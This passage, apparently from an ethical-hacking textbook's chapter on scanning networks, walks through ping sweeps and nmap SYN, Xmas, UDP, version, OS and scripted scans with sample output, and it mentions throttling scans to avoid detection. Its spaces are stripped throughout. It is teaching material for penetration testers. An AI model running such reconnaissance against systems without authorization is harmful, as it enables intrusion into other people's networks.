nttothem,theyprovideanappropriateresponsetothemessages.Thismeansyoucanidentifysystemsthatarealivebeforeyoustartaimingattacksorprobesatthem.Onewayofdeterminingsystemsthatarealiveistoperformapingsweep.Apingsweepiswhenyousendpingmessagestoeverysystemonthenetwork.ThepingisanICMPechorequest,whichisacommonmessagetobesent.Aslongasyouaren’tpoundingtargetswithanunusualnumberorsizeofthesemessages,theymaynotbenoticed.Pingsweepsaren’tguaranteedtosucceedbecausetheremaybefirewallrulesthatblockICMPmessagesfromoutsidethenetwork.UsingfpingWhiletherearemanytoolsthatcanperformapingsweep,oneofthecommononesisfping.ThisisatooldesignedtosendICMPechorequeststomultiplesystems.Inthefollowingcodelisting,youcanseetheuseoffpingtosweepmylocalnetwork.Theparametersusedwithfpingareaeg,whichmeansfpingshowshoststhatarealive,showselapsedtime,andgeneratesalistoftargetsfromanaddressblock.You’llseethelistofhoststhat158 Chapter5  ScanningNetworks■respondatthefrontofthelist.Afterthat,youstarttoseehostunreachablemessages,indicatingthatthehostisdown.fpingwillsendmultiplemessagestosystemsbeforegivingupanddeterminingit’sdown.Thisoutputistruncatedduetolength,butwithoutthea,theendofthelistwouldbeallofthehoststhatwereflaggedasdown.Asitis,allwegetistheindicationthatthesystemswereup.fpingOutput$fping-­aeg192.168.86.0/24192.168.86.1(10.3ms)192.168.86.2(16.4ms)192.168.86.12(27.7ms)192.168.86.21(17.4ms)192.168.86.11(173ms)192.168.86.20(82.7ms)192.168.86.31(0.04ms)192.168.86.30(14.3ms)192.168.86.32(16.4ms)192.168.86.35(16.9ms)192.168.86.37(21.7ms)192.168.86.38(20.4ms)192.168.86.39(22.2ms)192.168.86.22(216ms)192.168.86.43(15.6ms)192.168.86.44(14.7ms)192.168.86.49(0.37ms)192.168.86.50(14.3ms)192.168.86.51(18.8ms)192.168.86.52(15.3ms)192.168.86.28(294ms)192.168.86.58(19.9ms)192.168.86.47(375ms)192.168.86.53(508ms)192.168.86.63(404ms)192.168.86.160(15.6ms)192.168.86.162(25.7ms)192.168.86.170(14.6ms)192.168.86.189(18.9ms)192.168.86.196(25.6ms)192.168.86.200(32.7ms)192.168.86.205(72.2ms)PingSweeps 192.168.86.210(18.3ms)192.168.86.245(15.6ms)192.168.86.247(23.4ms)192.168.86.250(25.9ms)ICMPHostUnreachablefrom192.168.86.4ICMPHostUnreachablefrom192.168.86.4ICMPHostUnreachablefrom192.168.86.3ICMPHostUnreachablefrom192.168.86.3ICMPHostUnreachablefrom192.168.86.7ICMPHostUnreachablefrom192.168.86.7ICMPHostUnreachablefrom192.168.86.6ICMPHostUnreachablefrom192.168.86.6159192.168.86.31forICMPEchosentto192.168.86.31forICMPEchosentto192.168.86.31forICMPEchosentto192.168.86.31forICMPEchosentto192.168.86.31forICMPEchosentto192.168.86.31forICMPEchosentto192.168.86.31forICMPEchosentto192.168.86.31forICMPEchosenttoSincetheeparameterwaspassedtofping,itprovidestheelapsedtime.Thisistheround-­triptimebetweenthemessagethatwassentandtheresponsethatwasreceived.Someoftheseround-­triptimesarefairlyhigh,consideringit’sallonthelocalnetwork,eveniffpingisrunningonavirtualmachine,wherethehostoperatingsystemisusingwireless.Whilewehavealotofsystemsindicatingresponses,thatdoesn’tmeanthosearetheonlysystemsthatexistonthenetwork.Sincethisisthelocalnetwork,wecanbereasonablysurethatallofthisinformationiscorrect.However,network-­andhost-­basedfirewallsmayalsoblocktheseICMPechorequests.Justbecauseyoudon’tgetaresponsedoesnotmeanthatthehostsarenotup.Itmaymeanthatthereissomethingthat’sblockingthemessage.AfirewallmayrespondwithanICMPhostunreachable,justasyouseeintheprecedingcode,oritmaysimplydropthemessage,meaningtherewouldbenoresponse.Theremaybeotherreasonsforlackofaresponse,though.UsingMegaPingAnothertoolthatcanperformapingsweep,aswellasseveralotherfunctions,isMegaPing.MegaPingisaGUI-­basedtoolthatrunsunderWindows.Itincorporatesseveralfunctionsintoasingleinterface.ThepingsweepcanbeaccomplishedusingtheIPScannertool,whichyouwouldselectfromthelistontheleftside.Figure 5.1showsthefullinterfaceafterrunningtheIPscan.Bydefault,theMACaddressandhostnamesarenotincludedinthelist.Therearecheckboxesontherightside,however,thatcanbecheckedevenafteryouhaverunascan,andtheinformationwillbeadded.160 Chapter5  ScanningNetworks■FIGURE 5.1 MegaPingIPscannerAlongtheleftside,youwillseeseveralothertoolsthatyoucanmakeuseof.ItbecomesabitofaSwissArmyknifeforthepurposesofnetworktroubleshooting.Inadditiontotroubleshootingnetworkissues,thereisalsoaportscanningtool.I’llcoverportscanninginmoredetailinthenextsection.Thereareotherenumerationutilitiesyoumayfindusefulasyouareidentifyingsystemsandservicesonyourtargetnetwork.Hands-­onActivityDownloadacopyofMegaPingfromtheMagentoSoftwarewebsite.RunapingsweepusingtheIPscanner.MakesuretoidentifytheMACaddressesforallthesystems.Thepingsweepmaybetelling,butit’sonlyastart.Itmaybeusedjusttogetasenseofthenumberofhoststhatyoumayneedtothinkabouttesting.Thepingsweepwillgiveyouonlyalimitedamountofinformation.Justknowingahostisup(andtheinformationthatahostisn’tupmaybeunreliable)doesn’ttellyoualot.Ultimately,youwanttoknowwhatservicesarerunningonthehost.ApingsweepwillgiveyouanideaofwhatsystemsmaybePortScanning 161targetable.Dependingonhowyouareapproachingyourtestingandwhereyouare,thismaybevaluable.Youmayalsoconsiderjustmovingdirectlytoaportscan,especiallysinceportscannerswilloftendoapingaheadoftheportscantomakesurethesystemisupbeforebotheringtosendportprobes.PortScanningLet’sclearthisup,incasethereisconfusion.Wearen’ttalkingaboutpassingbyacruiseship,peeringinwindows.Wearetalkingaboutnetworkcommunicationdevices.Aportisaconstructwithintheoperatingsystem’snetworkstack.Whenanapplicationhasnetworkservicefunctionality,itbindstoaport,meaningitreservestheportandregisterstheapplicationtogetmessagesthatcomeinonthatport.Anycommunicationreceivedbythesystemaddressedtooneoftheportsgetsforwardedtotheapplicationthatisregisteredtothatport.Whenthereisanapplicationlisteningonaport,itisconsideredtobeopen.RememberthatportsexistattheTransportlayer,soapplicationsdeterminewhethertheyaregoingtouseUDPorTCPastheprotocoltolistenon.Thereasonformentioningthisisthattheobjectiveofportscanningistoidentifythesoftwarethatisboundtotheportsthatareidentifiedasopen.TCP,asyoushouldknow,usesathree-­wayhandshaketoinitiateconnections.Toaccomplishthehandshake,TCPmakesuseofflagsettings,whichmeansthereisasetofbitsthatareenabledordisabledtosetorunsettheflags.Thethree-­wayhandshakeusestheSYNandACKflagstocompletetheconnectionprocess.Otherflags,suchasURG,PSH,andFIN,areusedforotherpurposes,andtheRSTflagisusedtoletothersystemsknowtoceasecommunicationsonthedestinationportinthereceivedmessage.Portscannersmakeuseoftheknownrulesintheprotocoltomakedeterminationsaboutwhetheraportisopenornot.OpenportsshouldrespondtoaSYNmessagewithaSYN/ACK.ClosedportsshouldrespondtoaSYNmessagewithaRSTmessage.Whathappens,though,ifwesendothermessagestoopenorclosedports?Whywouldweevendothat,consideringthatweknowhowopenandclosedportsrespond?Thereasonrelatestosecuritytechnologieslikefirewallsandintrusiondetectionsystems.OtherTCPmessagesareusedtobypassthesedevicesandgetresponseswherethereotherwisemaynotbeanyresponse.Thewaytheprotocolisexpectedtoworkisdocumentedandsonetworkstackimplementationsadheretothedocumentation.Therearesomeexchangesthataresimplynotdocumented,sobehaviorisn’tguaranteedbecauseit’snotexpected.Theseexchangescanbeusedtoelicitresponsesfromourtargetsystems.UDPisanotherstoryaltogether.Thereisnodefinedwayofbeginningaconversationfromthestandpointoftheprotocol.UDPmessagesaresentfromaclienttoaserver,andit’suptotheserverhowitresponds.Theoperatingsystem’snetworkstackhasnoroleotherthantopassthemessageuptotheapplicationoncetheTransportlayerheadershavebeenprocessed.Thiscanbeachallengeforportscanners.Thereasonisthatwithnodefinedresponse,it’shardtodeterminewhetheralackofresponseisbecauseofaclosedportorjustbecausetheapplicationdidn’treceivewhatitexpected.Itcouldalsobethattheserverapplicationlisteningatthatportsimplydoesn’trespond.162 Chapter5  ScanningNetworks■Sincethereisnodefinedresponse,portscannershavetomakeabestguess.Ifthereisnoresponsetoaprobemessage,portscannersdon’tassumetheportisclosedbecauseitmaynotbe.Notonlymaytheapplicationjustnothaveresponded,butit’spossibletheUDPmessagewaslostintransmission,sincenothingintheprotocolensuresthatitgetsfromendtoend.Becauseeitherispossible,theprobemessageswillbere-­sent.Thereisadelayofsomesmallperiodoftimebetweeneachmessage.SendingmultiplemessageswithdelaysbetweenthemcancausesignificantUDPportscanstotakequiteabitmoretimethanaTCPscan.Asnotedearlier,portscannersmaysendICMPechorequeststotargetsbeforerunningaportscan.Thereisn’tmuchpointinsendingthousandsofmessagestoahostthatisn’tthere.Thisbehaviorcanbecontrolled,dependingontheportscannerbeingused.NmapThedefactoportscannerisnmap,shortfornetworkmapper.Afterall,ifit’sgoodenoughforCarrie-­AnneMossinTheMatrixReloadedandRihannainOcean’s8,itshouldbegoodenoughformeoryou.Thisisaprogramthathasbeenaroundsince1997andhasbecomesocommonlyusedthatotherportscannersimplementthesamecommand-­lineparametersbecausetheyaresowellknown.Itisn’tjustaportscanner,though;itsprimaryroleandotherfunctionsarejustextensionsofthecorepurposeofnmap.NmapcanperformUDPscansaswellasmultipletypesofTCPscanswhenitcomestoportscanning.Inaddition,nmapwilldetectoperatingsystemtypes,applications,andapplicationversions.Perhapsmoresignificantly,nmapsupportsrunningscripts.Thesescriptsallowanyonetoextendnmap’sfunctionality.Thescriptingengine,poweredbytheLuaprogramminglanguage,hasmodulesthatscriptscanbebuiltontopoftomakethejobofprobingsystemsmucheasier.TCPScanningAsit’sthemostdetailedandcomplextypeofscanningdone,I’llcoverthedifferenttypesofTCPscansthatnmapcanperform.First,weknowthattransportprotocolsuse2bytesfortheportnumberintheirheaders.Thismeansthereare65,536possibleports(0–65535).Scanningthatmanyports,especiallyconsideringthatthevastmajorityofthemaren’tusedbylisteningapplications,isverytime-­consuming.Tobeefficient,nmapwillscanonlyabout1,000portsbydefault,thoughyoucanspecifyanyportsfornmaptoscanthatyouwouldlike.These1,000portsaretheonesthataremostlylikelytohavealisteningservice.TherearemanytypesofTCPscanning.OneofthefirstonestolookatistheSYNscan.Thisissometimescalledahalf-­openscan,becauseconnectionsarelefthalfopen.nmapwillsendaSYNmessagetothetarget.Iftheportisopen,itrespondswithaSYN/ACKmessage,andnmapwillrespondtothatwithaRSTmessage,indicatingitdoesn’twanttocontinuewiththeconnection.Iftheportisclosed,thetargetsystemwillrespondwithitsownRSTmessage.Inthefollowingcodelisting,youcanseeaSYNscan,whichiscalledwith-­sSastheparameter.Then,youneedatarget.ThisscanisasingleIPaddress,butyoucanalsospecifyarangeoranetworkblock.PortScanning 163SYNScanwith nmap$nmap-­sS192.168.86.32StartingNmap7.70(https://nmap.org)at2021-­01-­0319:01MDTNmapscanreportforbillthecat.lan(192.168.86.32)Hostisup(0.022slatency).Notshown:500closedports,495filteredportsPORTSTATESERVICE22/tcpopenssh88/tcpopenkerberos-­sec445/tcpopenmicrosoft-­ds548/tcpopenafp5900/tcpopenvncMACAddress:AC:87:A3:36:D6:AA(Apple)Nmapdone:1IPaddress(1hostup)scannedin3.69secondsTodemonstratetheuseofanetworkblockasatarget,wecanmakeuseofafullconnectscan.RatherthanaRSTastheresponsetotheSYN/ACK,nmapwillcompletetheconnectionandthentearitdownoncetheconnectioniscomplete.WhatyouwillseeinthefollowingcodelistingistheuseofaCIDRblockasthetargetaddress.Thismeansnmapwillscantheentiresubnet.Youwillalsonoticethattheportsarespecified.Ratherthanjustdefaultingtothe1,000portsnmapwillusuallyscan,we’reonlygoingtogethoststhathaveport80and443open.Therecouldbemanyhostsonthenetworkthatwon’trespondtoascanlikethis.NmapFullConnectScan$nmap-­sT-­p80,443192.168.86.0/24StartingNmap7.70(https://nmap.org)at2021-­01-­0320:44MDTRTTVARhasgrowntoover2.3seconds,decreasingto2.0Nmapscanreportfortestwifi.here(192.168.86.1)Hostisup(0.011slatency).PORTSTATESERVICE80/tcpopenhttp443/tcpclosedhttpsMACAddress:18:D6:C7:7D:F4:8A(Tp-­linkTechnologies)Nmapscanreportfor192.168.86.2Hostisup(0.011slatency).164 Chapter5  ScanningNetworks■PORTSTATESERVICE80/tcpclosedhttp443/tcpclosedhttpsMACAddress:68:05:CA:46:70:88(IntelCorporate)Nmapscanreportfor192.168.86.11Hostisup(0.022slatency).PORTSTATESERVICE80/tcpclosedhttp443/tcpclosedhttpsMACAddress:C8:DB:26:02:EE:CC(Logitech)Nmapscanreportforharmonyhub.lan(192.168.86.12)Hostisup(0.014slatency).PORTSTATESERVICE80/tcpclosedhttp443/tcpclosedhttpsMACAddress:C8:DB:26:02:89:62(Logitech)Nmapscanreportformyq-­d9f.lan(192.168.86.20)Hostisup(0.026slatency).PORTSTATESERVICE80/tcpopenhttp443/tcpclosedhttpsMACAddress:64:52:99:54:7F:C5(TheChamberlainGroup)Therearetwothingsyoumaynoteintheoutput.First,wedon’tknowwhattheapplicationis.Allweknowistheprotocolthatisbeingused.Ofcourse,weassumeit’sawebserver,butwhatone?Evenifweknewwhattheoperatingsystemis,wecan’tassumewhichapplicationisbeingusedasthewebserver.ThesecondthingtonoticeisthatalongwiththeMACaddress,yougetthevendor.Thereisnothingspecialhere.nmaplooksuptheorganizationallyuniqueidentifier(OUI)partoftheMACaddressfromadatabaseandpresentstheresultofthelookup.ThereareadditionalTCPscansthatnmapcanrun.Theotherscansmakeuseofunexpectedinputasawayofpotentiallygettingdifferentresponses.Forexample,thefollowingcodelistingissomethingreferredtoasanXmasscan.ThereasonforthatisthatthepacketsbeingsenthavetheFIN,PSH,andURGflagsset,whichmakesthepacketlooklituplikeaChristmas(orXmas)tree.Whatyouwilllikelynoticequicklyisthatwedon’tgetanindicationaboutopenportshere,aswedidintheprecedingcode.Instead,nmapistellingusthatPortScanning 165theportiseitheropenorfiltered.Thereasonforthisisthatwithportsthatareclosed,thesystemrespondswithaRST.Portsthatareopendon’trespondatallbecausethisisnotalegalpacketfromtheperspectiveoftheprotocol.Ifnmapdoesn’tgetanyresponse,it’snotclearwhetherit’sbecauseanetworkdevicedroppedthemessageorifthesystemjustdidn’trespondtoanillegalmessage.Runningan XmasScanwith Nmap$nmap-­sX192.168.86.32StartingNmap7.70(https://nmap.org)at2021-­01-­0320:58MDTNmapscanreportforbillthecat.lan(192.168.86.32)Hostisup(0.0076slatency).Notshown:995closedportsPORTSTATESERVICE22/tcpopen|filteredssh88/tcpopen|filteredkerberos-­sec445/tcpopen|filteredmicrosoft-­ds548/tcpopen|filteredafp5900/tcpopen|filteredvncMACAddress:AC:87:A3:36:D6:AA(Apple)Nmapdone:1IPaddress(1hostup)scannedin13.13secondsThesameportsshowuphereaswiththeSYNscanearlier.Theonlydifferenceisthatnmapcan’tspecificallydeterminewhethertheportisopenorfiltered.Otherscans,suchastheNullscanwherenoflagsareset,willalsoshowresultsasbeingopenorfilteredforthesamereason.TheFINscanalsousesanunexpectedsetofflagssincetheFINflagshouldonlybesentincaseswherethereisanestablishedconnection.YouwillalsogetopenorfilteredfromtheFINscan.UDPScanningUDPscanningismuchmorestraightforwardthanTCPscanning.TherearenooptionsforUDPscanning.nmapsendsoutUDPmessagesandthenwatcheswhateverresponsesmaycomeback.Theexpectationisthatifaportisclosed,thesystemwillrespondwithanICMPportunreachablemessage.Ifaportisopen,theservicemayrespondwithsomethingoritmayjustnotrespondatall.Inthefollowingcode,youcanseeaUDPscanrunwithnmap.You’llnoticeonthecommandlinethatanewparameterhasbeenadded,-­T4.Thissetsthethrottlerate.Bydefault,thethrottleissetat3,whichisacommonrateofmessagetransmission.Ifyouwantitfaster,youcangoupto5.Ifyouwantittogoslower,potentiallytoavoiddetection,youcanturnitdownto1.SincethisisonmylocalnetworkandIdon’tcarehowfastittransmits,Ihavethethrottleratesetfor4.$nmap-­sU-­T4192.168.86.32StartingNmap7.70(https://nmap.org)at2021-­01-­0308:03MDT166 Chapter5  ScanningNetworks■Nmapscanreportforbillthecat.lan(192.168.86.32)Hostisup(0.0053slatency).Notshown:750closedports,247open|filteredportsPORTSTATESERVICE123/udpopenntp137/udpopennetbios-­ns5353/udpopenzeroconfMACAddress:AC:87:A3:36:D6:AA(Apple)Nmapdone:1IPaddress(1hostup)scannedin5.21secondsFigure 5.2willshowyouwhattheserequestslooklikeaftercapturingtheminWireshark,apacketcapturingprogram.Atthetopofthelistofpacketsaretheproberequestsfromthesystemrunningnmap.Ifyoulookatthepacketdecodeinthebottompane,youwillseethereisnodatainthepacket.TheUDPheaderisthe8bytesexpectedforaUDPheaderandthenthereisnopayload.ThebottomofthelistofpacketsshowstheICMPportunreachablemessagesfromthetargethost.FIGURE 5.2 UDPscanfromWiresharkYoucancomparethetimethatittakestoperformthedifferentscans.TheSYNscantookabitoverthreeseconds,whiletheUDPscantookjustoverfiveseconds.You’llalsonoticePortScanning 167thatthereareabout1,000portsscannedforUDPaswell.Westillhavetheproblem,though,ofnotknowingforsurewhatapplicationsarerunningbehindtheseports.Thisisalsosomethingnmapcantakecareofforus.PortScanningDownloadacopyofnmap.Youcanusethecommand-­lineversionortheGUIversionwithZenmap.Evenifyouhaveonlyasinglecomputer,youshouldhavearouteronyournetworkaswell.Ifyouhavenothingelse,youcanscantheIPaddressthatbelongstoyourrouter,alsoknownasthedefaultgateway.TryrunningbothTCPscansaswellasUDPscans.TrytwodifferenttypesofTCPscanstoseeifyougetanydifferentresults.DetailedInformationWecanusenmaptoaddresstheproblemofnotknowingtheapplication.Wecanuseversionscanning.Whatnmapdoeswhenwerunaversionscan(-­sV)isconnecttotheportand,asnecessary,issuethecorrectprotocolcommandstogettheapplicationbannerback.Thebannerisprotocol-­specificandmayincludesuchinformationasthesoftwarenameandversion.Inthefollowingcodelisting,youcanseenotonlytheprotocol,asyou’veseenbefore,butalsothesoftwarebeingusedandtheversionnumber.Forport22,thesystemisrunningOpenSSHversion7.4.The2.0 inparenthesesindicatesitisversion2.0oftheprotocol.Thisissomethingthattheserviceindicatesinthebanner.NmapVersionScan$nmap-­sV192.168.86.32StartingNmap7.70(https://nmap.org)at2021-­01-­0320:51MDTNmapscanreportforbillthecat.lan(192.168.86.32)Hostisup(0.0083slatency).Notshown:995closedportsPORTSTATESERVICEVERSION22/tcpopensshOpenSSH7.4(protocol2.0)88/tcpopenkerberos-­secHeimdalKerberos(servertime:2018-­07-­1502:51:39Z)445/tcpopenmicrosoft-­ds?548/tcpopenafpAppleAFP(name:billthecat;protocol3.4;OSX10.9-­10.11;Macmini7,1)5900/tcpopenvncAppleremotedesktopvncMACAddress:AC:87:A3:36:D6:AA(Apple)168 Chapter5  ScanningNetworks■ServiceInfo:OSs:OSX,MacOSX;CPE:cpe:/o:apple:mac_os_x:10.9,cpe:/o:apple:mac_os_xServicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.Nmapdone:1IPaddress(1hostup)scannedin35.23secondsnmapknowsthedetailsabouttheservicesbecausetheapplicationprovidestheinformationwhennmapconnects.Differentapplicationsandprotocolswillprovidedifferentsetsofinformation,whichmeansnmaphastounderstandhowtospeaktheseprotocolstogetthisinformationinsomecases.Asanexample,withwebserverssuchasApache,thesystemadministratorisinchargeofhowmuchshouldbeprovidedintheheadersgoingbacktotheclient.Apachecanprovidenotonlythenameoftheproduct,Apache,butalsotheversionofthesoftwareandthemodulesthatareloadedaswellastheversionsofthemodules.Youmayalsowanttoknowwhatoperatingsystemisrunningontheremotesystem.Thisisalsosomethingnmapcantakecareof,withanoperatingsystemscan.Tomakeadeterminationabouttheoperatingsystem,nmaphasadatabaseoffingerprints.Thefingerprintscontaindetailsabouthoweachoperatingsystembehaves,includinghowtheIPidentificationfieldisgenerated,theinitialsequencenumber,theinitialwindowsize,andseveralotherdetails.Toidentifytheoperatingsystem,nmaphastofindatleastoneopenportandoneclosedport.Inthefollowingcode,youcanseeanoperatingsystemscan.YouwillnoticethateventhoughIdidn’tindicateaTCPscan,nmapperformedone.Thesameportsthatwerefoundtobeopenbeforehavebeenidentifiedagain.Youwillalsonoticethatnmapscannedtwodifferentsystems.Thisisanotherwaynmapcanbetoldtoscansystemsratherthanrangesornetworkblocks.Ifyouprovidemultiplesystemsonthecommandline,nmapwillperformthesamescanoneachofthesystemsspecified.OperatingSystemScanwith Nmap$nmap-­O192.168.86.32192.168.86.30StartingNmap7.70(https://nmap.org)at2021-­01-­0320:54MDTNmapscanreportforbillthecat.lan(192.168.86.32)Hostisup(0.0039slatency).Notshown:995closedportsPORTSTATESERVICE22/tcpopenssh88/tcpopenkerberos-­sec445/tcpopenmicrosoft-­ds548/tcpopenafp5900/tcpopenvncMACAddress:AC:87:A3:36:D6:AA(Apple)PortScanning 169OSdetails:AppleMacOSX10.7.0(Lion)-­10.12(Sierra)oriOS4.1-­9.3.3(Darwin10.0.0-­16.4.0)NetworkDistance:1hopNmapscanreportfor192.168.86.30Hostisup(0.0040slatency).Notshown:997closedportsPORTSTATESERVICE22/tcpopenssh111/tcpopenrpcbind3128/tcpopensquid-­httpMACAddress:70:4D:7B:61:52:6B(AsustekComputer)Devicetype:generalpurposeRunning:Linux3.X|4.XOSCPE:cpe:/o:linux:linux_kernel:3cpe:/o:linux:linux_kernel:4OSdetails:Linux3.2-­4.9NetworkDistance:1hopOSdetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.Nmapdone:2IPaddresses(2hostsup)scannedin9.07secondsOnethingtokeepinmindwhenyoudoanoperatingsystemscanisthatnmapreliesonfingerprints,andunlikepeople,thesamefingerprintcanmatchmultipleoperatingsystems.Aslongasnothinginthenetworkstackhaschanged,youwillfindthatmultipleversionsofacommercialoperatingsystemwillmatchthesamefingerprint.YoucanseethisisthecasewithAppleMacOSX,nowknownasmacOS.Thereareseveralversionsthatmatchthesamefingerprint,includingsomeversionsofiOS.Theversionrunningonthetargetdoesfallintotherangeindicatedbynmap.Oneotherthingtokeepinmindisthatnmaptrackstheoperatingsystem.Theoperatingsystemisreallythekernel—­thepieceofsoftwarethatmanagesthehardware,managesmemory,andmanagesprocesses.Alltheotherstuffthathelpstheuserinteractwiththeoperatingsystemtodouser-­usefulthingsisintheoperatingenvironment,tohelpdrawdistinctions.InthecaseofLinux,thesamekernelmaybeusedacrossmultipledistributions,butsincetheonlythingbeingidentifiedisthekernel,thereisnowaytoknowwhatdistribution.nmapcan’ttellyouUbuntuversusCentOS,forexample.ItonlyknowstheversionoftheLinuxkernelyouarerunning.ScriptingWe’veseenalotofthefunctionalitythatnmaphas.Evenwithallthatfunctionality,wecangobeyond.nmapincludesascriptingengine,whichallowsyou,asannmapuser,toextendthefunctionalityinanywaythatyouwouldlike.It’snotentirelyaboutextendingthefunctionalityyourself,though.Thescriptingengineisthere,butit’snotcompletelyuptoyou170 Chapter5  ScanningNetworks■todeterminewhatyouwanttodowithit.Therearehundredsofscriptsavailablewiththelatestversionofnmap,andthenumbercontinuestogrow.Theyaregroupedintocategories,whichcurrentlyareauth,broadcast,brute,default,discovery,dos,exploit, external, fuzzer,intrusive, malware, safe,version,and vuln.Youcanhavenmaprunallthescriptsfromaparticularcategory.Thefollowingcodeisnmapbeingaskedtorunallthescriptsinthediscoverycategory.NmapDiscoveryScripts$nmap-­sS-­-s­cript=discovery192.168.86.0/24StartingNmap7.70(https://nmap.org)at2021-­01-­0313:28MDTPre-­scanscriptresults:|broadcast-­igmp-­discovery:|192.168.86.22|Interface:eth0|Version:2|Group:224.0.0.251|Description:mDNS(rfc6762)|192.168.86.28|Interface:eth0|Version:2|Group:224.0.0.251|Description:mDNS(rfc6762)|192.168.86.32|Interface:eth0|Version:2|Group:224.0.0.251|Description:mDNS(rfc6762)|192.168.86.47|Interface:eth0|Version:2|Group:224.0.0.251|Description:mDNS(rfc6762)Touseascript,youhavetopassthe-­-­script=parameterfollowedbythenameofthescriptyouwanttorun.Inadditiontousingthenameofthescript,youcanindicatethecategory,asIdidintheprecedingcode.OnaLinuxsystem,youwillprobablyfindalltheinstalledscriptsin/usr/share/nmap/scripts.OnaWindowssystem,youwillfindthescriptsintheProgramFilesdirectorywherenmapisinstalled.You’llnoticethatthefileextensionforthesescriptsis.nsefor“nmapscriptingengine.”ScriptsarewrittenintheLualanguage,andeachfilecanbeopenedandread,possiblytogetdetailsaboutthefunctionofthescript.Ifyou’dratherusenmaptogetinformationaboutthescript,youcanusePortScanning 171–script-­help,passinginthenameofthescript.Asanexample,let’ssayyouwanttogetthedetailsabouthttp-­waf-­detect.nse.Hereyoucanseehowtocallnmaptogethelpandthestartoftheresponsefromnmap.NmapScriptHelp$nmap-­-­script-­help=http-­waf-­detect.nseStartingNmap7.70(https://nmap.org)at2021-­01-­0313:42MDThttp-­waf-­detectCategories:discoveryintrusivehttps://nmap.org/nsedoc/scripts/http-­waf-­detect.htmlAttemptstodeterminewhetherawebserverisprotectedbyanIPS(IntrusionPreventionSystem),IDS(IntrusionDetectionSystem)orWAF(WebApplicationFirewall)byprobingthewebserverwithmaliciouspayloadsanddetectingchangesintheresponsecodeandbody.Anotherwayoffindingthisinformationwouldbetojustgotothescriptitself.Whenyouarewritingnmapscripts,therearevariablesthatgetset,andoneofthoseisthedescription.Thisisthevariablethatgetsprintedwhenscript-­helpiscalled.Additionally,you’llnoticethereisasectiononusage,indicatinghowthescriptshouldbecalledfromnmap.You’llalsonoticetherequirestatementsatthetop.Thisiswherethefunctionalityfromthenmapscriptingengineispulledin.Thesemodulesareneededforthescripttobecalledfromnmap.Topofthehttp-­waf-­detect.nseFilelocallocallocallocallocalhttp=require"http"shortport=require"shortport"stdnse=require"stdnse"string=require"string"table=require"table"description=[[AttemptstodeterminewhetherawebserverisprotectedbyanIPS(IntrusionPreventionSystem),IDS(IntrusionDetectionSystem)orWAF(WebApplicationFirewall)byprobingthewebserverwithmaliciouspayloadsanddetectingchangesintheresponsecodeandbody.172 Chapter5  ScanningNetworks■Todothisthescriptwillsenda"good"requestandrecordtheresponse,afterwardsitwillmatchthisresponseagainstnewrequestscontainingmaliciouspayloads.Intheory,webapplicationsshouldn'treacttomaliciousrequestsbecausewearestoringthepayloadsinavariablethatisnotusedbythescript/fileandonlyWAF/IDS/IPSshouldreacttoit.Ifaggromodeisset,thescriptwilltryallattackvectors(Morenoisy)]]-­-­-­-­-­@usage-­-­nmap-­p80-­-­scripthttp-­waf-­detect-­-­nmap-­p80-­-­scripthttp-­waf-­detect-­-­script-­args="http-­waf-­detect.aggro,http-­waf-­detect.uri=/testphp.vulnweb.com/artists.php"www.modsecurity.org-­-­-­-­@output-­-­PORTSTATESERVICE-­-­80/tcpopenhttp-­-­|_http-­waf-­detect:IDS/IPS/WAFdetectedInadditiontocallingindividualscripts,youcanhavenmapselectmultiplescriptsusingwildcards.If,forexample,youwantedtorunallthescriptsrelatedtotheServerMessageBlock(SMB)protocolversion2,youcouldjustindicatethatthescriptsyouwanttorunarenamedsmb2*.Thismeansanyscriptthatstartswithsmb2willgetrun.TherearethreethatwillgetruniftheSMBportsarefoundtobeopen.Youcanseecallingthescriptandtheresultsinthefollowingcodelisting.You’llnoticethattheportscanidentifiedport445asbeingopen.ThisistheportusedfortheCommonInternetFileSystem(CIFS),whichisanimplementationofSMBv2.Thisistheportthattriggeredtherunningofthescripts,meaningthatwhennmapfoundtheporttobeopen,itidentifiedallthescriptsthathadregisteredthatportandnmapranthosescripts.NmapUsingWildcards$nmap-­sS-­-s­cript"smb2*"-­T4192.168.86.32StartingNmap7.70(https://nmap.org)at2021-­01-­0315:32MDTNmapscanreportforbillthecat.lan(192.168.86.32)Hostisup(0.00024slatency).Notshown:500closedports,495filteredportsPORTSTATESERVICE22/tcpopensshPortScanning 17388/tcpopenkerberos-­sec445/tcpopenmicrosoft-­ds548/tcpopenafp5900/tcpopenvncMACAddress:AC:87:A3:36:D6:AA(Apple)Hostscriptresults:|smb2-­capabilities:|2.10:|Leasing|Multi-­creditoperations|3.00:|Leasing|Multi-­creditoperations|Encryption|3.02:|Leasing|Multi-­creditoperations|_Encryption|smb2-­security-­mode:|2.10:|_Messagesigningenabledandrequired|_smb2-­time:Protocolnegotiationfailed(SMB2)Nmapdone:1IPaddress(1hostup)scannedin3.44secondsAsyoucansee,youcanusethenmapscriptstocollectalotofinformationaboutdifferentservices.Asofthiswriting,therearemorethan600scripts.Outofthat600plus,morethan30ofthemaretargetedspecificallyatidentifyingifaserverispotentiallyexposedtoavulnerabilityknownwithaCommonVulnerabilitiesandExposures(CVE)identifier.Otherscriptswillidentifysystemsthatarevulnerabletootherexposures.Asanotherexample,thereisascriptthatlooksfortheDecryptingRSAwithObsoleteandWeakenedeNcryption(DROWN)vulnerabilityinserversthatarerunningSecureSocketsLayer(SSL)version2.Thiswasaseriousvulnerability,anditcanbeidentifiedbyinteractingwiththesystemusingSSL.Ifyouhavesomeprogrammingexperience,youmayfindthatextendingnmapwithyourownscriptsisafairlyeasyprocess.SincealltheNSEscriptsareinplaintext,youcanuseanyofthemasastartingpointortograbcodesamplesthatyoucanputtogethertocreateyourownscript.Keepinmindthatwhilenmapisaportscannerandcanidentifyopenports,thescriptingengineisusedtoperformdeeperinteractionswiththeapplication.Thescriptscanalsomakeprogrammaticdeterminationsbasedontheresponsesthatareprovidedbytheservice.Thescriptingenginemodulesnotonlyprovidefunctionalitytointeractwiththe174 Chapter5  